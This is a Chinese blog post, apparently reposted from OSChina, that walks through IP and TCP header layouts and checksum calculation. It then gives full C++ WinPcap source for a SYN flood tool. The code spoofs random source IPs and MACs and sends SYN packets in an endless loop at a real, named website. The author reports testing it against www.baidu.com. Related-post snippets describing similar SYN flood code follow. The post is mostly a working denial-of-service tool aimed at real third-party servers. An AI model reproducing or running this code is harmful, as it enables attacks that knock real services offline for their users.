基于winpcap和syn的dos攻击,亲测

最新推荐文章于 2023-04-20 19:56:28 发布
最新推荐文章于 2023-04-20 19:56:28 发布
阅读量268 收藏
点赞数
文章标签: 操作系统 网络
原文链接:https://my.oschina.net/meiqizhang/blog/524519
版权 

<span style="font-family: Arial, Helvetica, sans-serif; background-color: rgb(255, 255, 255);">网上这样的帖子很多,但有几个问题一直没解决。</span>

1、在计算TCP报头的校验和时应该还有伪报头,很多人都没有。

2、在封装以太网数据包时需要用到目的地址的mac地址,由于很多人是在虚拟机上测,目的mac也就知道,但事实上,对于真正的远端主机来说,我们只能获取它的IP地址,而mac地址是无法获取的。而事实上,这儿的目标mac应该写的是网关mac地址。

下面看我一步一步写syn攻击。

一、首先要清楚TCP/IP报头,清楚三次握手,这个别的地方将的很多。而syn flood攻击就是向服务器发送大量的syn请求包,让服务器保持这些连接而拒绝其他正常连接请求。

/*                       IP报文格式
	0            8           16                        32
	+------------+------------+-------------------------+
	| ver + hlen |  服务类型  |         总长度          |
	+------------+------------+----+--------------------+
	|           标识位        |flag|   分片偏移(13位)   |
	+------------+------------+----+--------------------+
	|  生存时间  | 高层协议号 |       首部校验和        |
	+------------+------------+-------------------------+
	|                   源 IP 地址                      |
	+---------------------------------------------------+
	|                  目的 IP 地址                     |
	+---------------------------------------------------+

*/

struct IP_HEADER
{
	byte versionAndHeader;
	byte serviceType;
	byte totalLen[2];
	byte seqNumber[2];
	byte flagAndFragPart[2];
	byte ttl;
	byte hiProtovolType;
	byte headerCheckSum[2];
	byte srcIpAddr[4];
	byte dstIpAddr[4];
};

/*
	                      TCP 报文
	0                       16                       32	
	+------------------------+-------------------------+
	|      源端口地址        |      目的端口地址       |
	+------------------------+-------------------------+
	|                      序列号                      |
	+--------------------------------------------------+
	|                      确认号                      |
	+------+--------+--------+-------------------------+
	|HLEN/4| 保留位 |控制位/6|         窗口尺寸        |
	+------+--------+--------+-------------------------+
	|         校验和         |         应急指针        |
	+------------------------+-------------------------+
*/

struct TCP_HEADER
{
	byte srcPort[2];
	byte dstPort[2];
	byte seqNumber[4];
	byte ackNumber[4];
	byte headLen;
	byte contrl;
	byte wndSize[2];
	byte checkSum[2];
	byte uragentPtr[2];
};
struct PSDTCP_HEADER //这是TCP的伪报头,在计算TCP的校验和时需要包含
{ 
    byte srcIpAddr[4];     //Source IP address; 32 bits
    byte dstIpAddr[4];     //Destination IP address; 32 bits 
    byte padding;          //padding
    byte protocol;         //Protocol; 8 bits
    byte tcpLen[2];        //TCP length; 16 bits
} ;

struct ETHERNET_HEADER //以太网帧头
{  
	byte dstMacAddr[6];
	byte srcMacAddr[6];
	byte ethernetType[2];
};

我还是直接贴代码吧


#include <stdio.h>
#include <stdlib.h>
#include <pcap.h>
#include <winsock2.h>
#include <conio.h>
#include <iostream>
#include <packet32.h>
#include <ntddndis.h>
#include <time.h>
#include <string>
#include <vector>

using namespace std;

#pragma comment(lib, "../common/lib/Packet.lib")
#pragma comment(lib, "../common/lib/wpcap.lib")
#pragma comment(lib, "ws2_32.lib")


/*                       IP报文格式
	0            8           16                        32
	+------------+------------+-------------------------+
	| ver + hlen |  服务类型  |         总长度          |
	+------------+------------+----+--------------------+
	|           标识位        |flag|   分片偏移(13位)   |
	+------------+------------+----+--------------------+
	|  生存时间  | 高层协议号 |       首部校验和        |
	+------------+------------+-------------------------+
	|                   源 IP 地址                      |
	+---------------------------------------------------+
	|                  目的 IP 地址                     |
	+---------------------------------------------------+

*/

struct IP_HEADER
{
	byte versionAndHeader;
	byte serviceType;
	byte totalLen[2];
	byte seqNumber[2];
	byte flagAndFragPart[2];
	byte ttl;
	byte hiProtovolType;
	byte headerCheckSum[2];
	byte srcIpAddr[4];
	byte dstIpAddr[4];
};

/*
	                      TCP 报文
	0                       16                       32	
	+------------------------+-------------------------+
	|      源端口地址        |      目的端口地址       |
	+------------------------+-------------------------+
	|                      序列号                      |
	+--------------------------------------------------+
	|                      确认号                      |
	+------+--------+--------+-------------------------+
	|HLEN/4| 保留位 |控制位/6|         窗口尺寸        |
	+------+--------+--------+-------------------------+
	|         校验和         |         应急指针        |
	+------------------------+-------------------------+
*/

struct TCP_HEADER
{
	byte srcPort[2];
	byte dstPort[2];
	byte seqNumber[4];
	byte ackNumber[4];
	byte headLen;
	byte contrl;
	byte wndSize[2];
	byte checkSum[2];
	byte uragentPtr[2];
};

struct PSDTCP_HEADER
{ 
    byte srcIpAddr[4];     //Source IP address; 32 bits
    byte dstIpAddr[4];     //Destination IP address; 32 bits 
    byte padding;          //padding
    byte protocol;         //Protocol; 8 bits
    byte tcpLen[2];        //TCP length; 16 bits
} ;

struct ETHERNET_HEADER
{  
	byte dstMacAddr[6];
	byte srcMacAddr[6];
	byte ethernetType[2];
};

struct DEVS_INFO
{
	char szDevName[512];
	char szDevsDescription[512];
};

int GetAllDevs( DEVS_INFO devsList[] )
{
	int nDevsNum = 0;
	pcap_if_t *alldevs;
	char errbuf[PCAP_ERRBUF_SIZE];
	if ( pcap_findalldevs(&alldevs,errbuf) == -1 )
	{
		return -1;
		printf("error in pcap_findalldevs_ex: %s\n",errbuf);
	}
	for ( pcap_if_t *d = alldevs; d != NULL; d = d->next )
	{
		strcpy( devsList[nDevsNum].szDevName, d->name );
		strcpy( devsList[nDevsNum].szDevsDescription, d->description );
		nDevsNum++;
	}
	pcap_freealldevs(alldevs);
	
	return nDevsNum;
}

int GetAdapterMacAddr( char *lpszAdapterName, unsigned char ucMacAddr[] )
{
	LPADAPTER lpAdapter = PacketOpenAdapter( lpszAdapterName );
	if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
	{
		return -1;
	}	

	PPACKET_OID_DATA oidData = ( PPACKET_OID_DATA )malloc(6 + sizeof(PACKET_OID_DATA));
	if ( NULL == oidData ) 
	{
		PacketCloseAdapter(lpAdapter);
		return -1;
	}

	oidData->Oid = OID_802_3_CURRENT_ADDRESS;
	oidData->Length = 6;
	memset(oidData->Data, 0, 6 );
	
	BOOLEAN  bStatus = PacketRequest(lpAdapter, FALSE, oidData);
	if ( bStatus )
	{
		for ( int i = 0; i < 6; ++i )
		{
			ucMacAddr[i] = (oidData->Data)[i];
		}
	}
	else
	{
		return -1;
		free( oidData );
	}
	free( oidData );
	PacketCloseAdapter( lpAdapter );
	return 0;
}


int GetIpByHost(const char *lpszHost, std::vector<std::string> &ipList )
{
	WSADATA wsadata;
	WSAStartup(MAKEWORD(2, 2),&wsadata);
	hostent *phost=gethostbyname( lpszHost );
	in_addr addr;
	char *p = phost->h_addr_list[0];
	for(int i = 1; NULL != p; i++)
	{
		memcpy(&addr.S_un.S_addr, p, phost->h_length);
		ipList.push_back( inet_ntoa( addr ));
		p = phost->h_addr_list[i];
	}
	return 0;
}

int GetGatewayMacAddr( byte macAddr[] )
{
	byte mac[] = {0x00, 0x00, 0x5e, 0x00, 0x01, 0x48};
	//00-00-5e-00-01-48
	memcpy( macAddr, mac, 6 );
	return 0;
}


unsigned short CheckSum(unsigned short packet[], int size )
{
	unsigned long cksum = 0;
    while (size > 1) 
    {
        cksum += *packet++;
        size -= sizeof(USHORT);
    }
    if (size) 
    {
        cksum += *(UCHAR*)packet;
    }
    cksum = (cksum >> 16) + (cksum & 0xFFFF);
    cksum += (cksum >>16);

    return (USHORT)(~cksum);
}

int EncodeSynPacket( byte packet[], const char *lpszSrcIpAddr, const char *lpszDstIpAddr, byte srcMacAddr[])
{
	TCP_HEADER tcpHeader;
	memset(&tcpHeader, 0, sizeof tcpHeader );
	*(unsigned short *)tcpHeader.srcPort = htons(9999);
	*(unsigned short *)tcpHeader.dstPort = htons(80);
	*(unsigned int *)tcpHeader.seqNumber = htonl(0xFFFF);
	*(unsigned int *)tcpHeader.ackNumber = htonl(0x00);
	tcpHeader.headLen = 5 << 4; 
	tcpHeader.contrl = 1 << 1;
	*(unsigned short *)tcpHeader.wndSize = htons(0xFFFF);
	
	IP_HEADER ipHeader;
	memset( &ipHeader, 0, sizeof ipHeader );
	unsigned char versionAndLen = 0x04;
	versionAndLen <<= 4;
	versionAndLen |= sizeof ipHeader / 4; //版本 + 头长度

	ipHeader.versionAndHeader = versionAndLen;
	*(unsigned short *)ipHeader.totalLen = htons( sizeof(IP_HEADER) + sizeof(TCP_HEADER) ); 

	ipHeader.ttl = 0xFF;
	ipHeader.hiProtovolType = 0x06;

	*(unsigned int *)(ipHeader.srcIpAddr) = inet_addr(lpszSrcIpAddr);
	*(unsigned int *)(ipHeader.dstIpAddr) = inet_addr(lpszDstIpAddr);
	//*(unsigned short *)(ipHeader.headerCheckSum) = CheckSum( (unsigned short *)&ipHeader, sizeof ipHeader );
	
	byte gatewayMac[] = {0x00, 0x00, 0x5e, 0x00, 0x01, 0x48};

	ETHERNET_HEADER ethHeader;
	memset(ðHeader, 0, sizeof ethHeader);
	memcpy(ethHeader.dstMacAddr, gatewayMac, 6);
	memcpy(ethHeader.srcMacAddr, srcMacAddr, 6);
	*(unsigned short *)ethHeader.ethernetType = htons(0x0800);

	//memset(packet, 0, sizeof packet);
	memcpy(packet, ðHeader, sizeof ethHeader);
	memcpy(packet + sizeof ethHeader, &ipHeader, sizeof ipHeader);
	memcpy(packet + sizeof ethHeader + sizeof ipHeader, &tcpHeader, sizeof tcpHeader);
	
	return (sizeof ethHeader + sizeof ipHeader + sizeof tcpHeader);
}

int main()
{
	system("mode con cols=110 lines=20");
	
	DEVS_INFO devsList[64];
	int nDevsNum = GetAllDevs( devsList );
	if ( nDevsNum < 1 )
	{
		printf("Get adapter infomation failed!");
		exit(0);
	}

	for ( int i = 0; i < nDevsNum; ++i )
	{
		printf("%d  %s\t%s\n", i+1, devsList[i].szDevName, devsList[i].szDevsDescription );
	}
	printf("Input your select adapter index: ");
	int selIndex = 0;
	scanf("%d", &selIndex);
	if ( selIndex < 0 || selIndex > nDevsNum+1 )
	{
		printf("Out of range!\nPress any key to exit...");
		getch();
		return 0;
	}

	char szError[PCAP_ERRBUF_SIZE];
	pcap_t *handle = pcap_open_live(devsList[selIndex-1].szDevName, 65536, 1, 1000, szError );
	if ( NULL == handle )
	{
		printf("Open adapter failed!\nPress any key to exit...");
		getch();
		return 0;
	}

	byte localMacAddr[6];
	memset(localMacAddr, 0, sizeof localMacAddr);
	if ( 0 != GetAdapterMacAddr(devsList[selIndex-1].szDevName, localMacAddr) )
	{
		printf("Get localhost mac addr failed!\nPress any key to exit...");
		getch();
		return 0;
	}

	std::vector<std::string> ipList;
	GetIpByHost("www.szbike.com", ipList);

	byte packet[1024];
	int size = EncodeSynPacket( packet, "0.0.0.0", ipList[0].c_str(), localMacAddr);
	
	//return 0;
	ETHERNET_HEADER *pEtherentHeader = (ETHERNET_HEADER *)packet;
	IP_HEADER *pIpHeader = ( IP_HEADER *)(packet + sizeof(ETHERNET_HEADER));
	TCP_HEADER *pTcpHeader = ( TCP_HEADER *)(packet + sizeof(ETHERNET_HEADER) + sizeof(IP_HEADER));

	//*srand(time(0));
	unsigned short srcPort = 0;//= rand() %0xFFFFFFFF;
	unsigned int srcIpAddr = 0;
	unsigned int baseIpAddr = ntohl(inet_addr("10.126.0.0"));

	byte psdPacket[128];
	memset(psdPacket, 0x00, sizeof psdPacket );
	PSDTCP_HEADER *psdHeader = (PSDTCP_HEADER *)psdPacket;

	*(unsigned int *)(psdHeader->dstIpAddr) = inet_addr(ipList[0].c_str());
	*(unsigned short *)(psdHeader->tcpLen)  = htons(sizeof(TCP_HEADER));	
	psdHeader->protocol = 0x06;
	psdHeader->padding  = 0x00;

	memcpy( psdPacket + sizeof(PSDTCP_HEADER), pTcpHeader, sizeof(TCP_HEADER));

	unsigned int seq = 0;
	srand( time(0) );
	while ( 1 )
	{
		for ( int i = 0; i < 6; ++i )
		{
			pEtherentHeader->srcMacAddr[i] = (byte)(rand() % (0xFF+1) );
		}

		seq = rand() % 0xFFFFFF;
		srcPort = rand() % 0xFFFF;
		srcIpAddr = baseIpAddr + rand() % 0xFFFF;

		*(unsigned int *)(pIpHeader->srcIpAddr) = htonl(srcIpAddr);
		*(unsigned short *)(pIpHeader->headerCheckSum) = 0x0000;
		*(unsigned short *)(pIpHeader->headerCheckSum) = CheckSum( ( unsigned short * )pIpHeader, sizeof (IP_HEADER));
		
		*(unsigned int *)(psdHeader->srcIpAddr) = htonl(srcIpAddr);
		*(unsigned int *)(psdHeader->srcIpAddr) = htonl(srcIpAddr);

		TCP_HEADER *psdTcpHeader = (TCP_HEADER *)(psdPacket + sizeof(PSDTCP_HEADER) );

		*(unsigned int *)(psdTcpHeader->seqNumber) = htonl(seq);
		*(unsigned int *)(pTcpHeader->seqNumber) = htonl(seq);//htonl(rand() % 0xFFFFFF );

		*(unsigned short *)(pTcpHeader->srcPort) = htons(srcPort);
		*(unsigned short *)(psdTcpHeader->srcPort) = htons(srcPort);

		*(unsigned short *)(pTcpHeader->checkSum) = 0x0000;
		*(unsigned short *)(pTcpHeader->checkSum) = CheckSum( (unsigned short *)psdPacket, sizeof(PSDTCP_HEADER) + sizeof(TCP_HEADER) );

		//system("pause");
		Sleep(0);
		pcap_sendpacket(handle, packet, size );
	}

	if ( NULL == handle )
	{
		printf("\nUnable to open the adapter. %s is not supported by WinPcap\n");
		return 0;
	}
	pcap_close(handle);	
	return 0;
}


这是对www.baidu.com的测试,可以看到,发出之后百度返回了syn+ack,这时如果我们不再继续,百度的服务器就会等一段时间,这就实现了一次攻击,当然了,真正的攻击需要成千上万个这样的数据包。

在测试的时候有时候收到syn+ack后,系统会自动发一个rest,开启windows防火墙可避免这种情况。


版权声明:本文为博主原创文章,未经博主允许不得转载。

转载于:https://my.oschina.net/meiqizhang/blog/524519

chengsi589544
关注
网络编程】SYN Flood (SYN洪水攻击) 源代码分析
jiange_zh的博客
01-01 2万+
一.原理1、TCP握手协议第一次握手:建立连接时,客户端发送syn包(syn=j)到服务器,并进入SYN_SEND状态,等待服务器确认;第二次握手:服务器收到syn包,必须确认客户的SYN(ack=j+1),同时自己也发送一个SYN包(syn=k),即SYN+ACK包,此时服务器进入SYN_RECV状态;第三次握手:客户端收到服务器的SYN+ACK包,向服务器发送确认包ACK(ack=k+1),此包
基于WinPcap开发的flood攻击测试程序
12-01
基于WinPcap开发的flood攻击测试程序,伪造TCP包向服务器发送大量半连接包,使服务器连接资源耗尽,以达到攻击目的。测试代码适用于初学TCP IP协议,理解TCP三次握手
synflood 攻击 C语言文件 源码 原始套接字
04-23
synflood源码,C语言实现原始套接字可以直接编译,执行./synflood ip
syn flood 攻击实现
weixin_34275734的博客
11-02 301
winpcap基础上实现syn flood(内网),几个关键问题的实现。 1、程序实现中的源IP问题 伪造的syn包需要填写源IP和源MAC,如果填本机,操作系统收到ACK包后,会返回一个RST包,攻击无法实现。 所以填写一个不存在的源IP和源MAC,为了使被攻击主机发送ACK包,所以,在syn flood的同时,向目的主机大量 发送ARP欺骗包,告诉他,那个伪造的IP是存在的,MAC地址...
SYN flood攻击
11-05
总结,SYN Flood攻击是一种常见的DoS攻击手段,利用TCP连接建立过程中的漏洞来消耗服务器资源。WinPcap作为网络封包捕获工具,可以在防御此类攻击中发挥作用,通过对网络流量的监控和分析,及时发现并阻止异常的SYN...
SYN洪泛攻击网络攻防原理与技术)
qq_42578714的博客
07-08 1196
第一次写博客,因为在调试那本书的代码的时候碰到很多问题,感谢CSDN的帮助,现在准备把调试好了的源码发出来给学弟学妹们分享,也供大家交流学习,本人很菜,如有问题,请多指正。 本段代码仅限于研究学习,禁止用于破坏活动,对于出现安全问题,本人概不负责! 运行环境:VS2013、WinPcap #define WIN32_LEAN_AND_AND_MEAN #define _WSPIAPI...
Dos(SYN Flood).rar
10-28
C语言实现(基于WinPcap4.3.1)的SYN Flood洪水攻击VS工程文件夹。 攻击效果:靶机上建立许多SYN-RECEIVED连接,导致靶机资源耗尽而拒绝服务。 调试编译环境: VS2013Ultimate
win_pcap模拟syn_flood攻击
ChenYitian
03-12 3805
syn_flood攻击得原理很简单,通过向目的主机发送大量建立TCP连接得请求,但源IP地址是乱填的,所以本机不会收到TCP应答,而其它主机收到TCP应答后由于之前并没有请求过TCP连接,所以会丢弃这个应答,导致被攻击的主机空等一段时间,资源被白白浪费。 当然这也是理论上的结果,实际上在现在,这种攻击肯定是行不通的。 #include #include #include #include
SYN flood C源代码
01-25
SYN flood是属于DOS攻击的一种典型方式,其发生方式就出现在TCP连接的三次握手中,假设一个用户向服务器发送了SYN报文后突然死机或掉线,那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成),这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接,这段时间的长度我们称为SYN Timeout,一般来说这个时间是分钟的数量级(大约为30秒 -2分钟);一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题,但如果有一个恶意的攻击者大量模拟这种情况,服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源----数以万计的半连接,即使是简单的保存并遍历也会消耗非常多的CPU时间和内存,何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大,最后的结果往往是堆栈溢出崩溃---即使服务器端的系统足够强大,服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小),此时从正常客户的角度看来,服务器失去响应,并处于崩溃状态,这种情况我们称之为:服务器端受到了SYN Flood攻击SYN洪泛)。
WinPcap.zip
10-05
c++调用winpcap接口,完成对udp ip等主流协议的抓包与分析,另附l2tp PPPoE radius协议的网络包,有助于了解协议首部,可用wireshark打开
c++实现发送syn数据包
12-28
自己写的一个发送tcp的syn数据包的程序,能够根据指定ip发送相应的syn数据包。
Python的syn flood攻击代码
weixin_33856370的博客
12-08 910
2019独角兽企业重金招聘Python工程师标准>>> ...
DOS攻击Synflood攻击
xwl1998的博客
07-08 4043
本文章记录大三网络信息安全课做过的一个小攻击实验,利用TCP三次握手原理进行洪水攻击,分享给大家!切勿用于非法之用,虽然本实验可能还没有能攻击到服务器崩溃的能力... 1.攻击原理 利用代码构造大量不存在的伪源地址,向攻击目标主机不断发送syn包请求建立连接,服务器为该连接分配资源并且回复Ack确认包,并等待客户确认。 由于源地址是伪造不存在的地址,服务器无法收到客户...
DoS的SYN泛洪攻击,原理及解决方案,学到就是赚到!
藏宝大厦
08-28 4092
从配置Winpcap环境(dev c++)到运行HTTP数据包捕获还原
最新发布
lsm1227msl的博客
04-20 1392
2.打开Dev c++,工具——》编译选项——》编译器配置——》目录——》库,点击红框处添加Winpcap开发包中的Lib文件夹。链接:https://pan.baidu.com/s/155x_BiCf-O0gNLk29_nTWw?4.新建一个空项目,点击“项目”——》"项目属性",依照下图添加wpcap.lib和WS2_32.lib。3.继续向"C包含文件"和"C++包含文件"中添加开发者包中的Include文件夹。我的环境:WindosXP虚拟机 , Dev C++
DoS攻击Syn洪泛攻击原理及防御
weixin_42191656的博客
07-18 3097
DDos之SYN洪泛攻击原理及防御
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值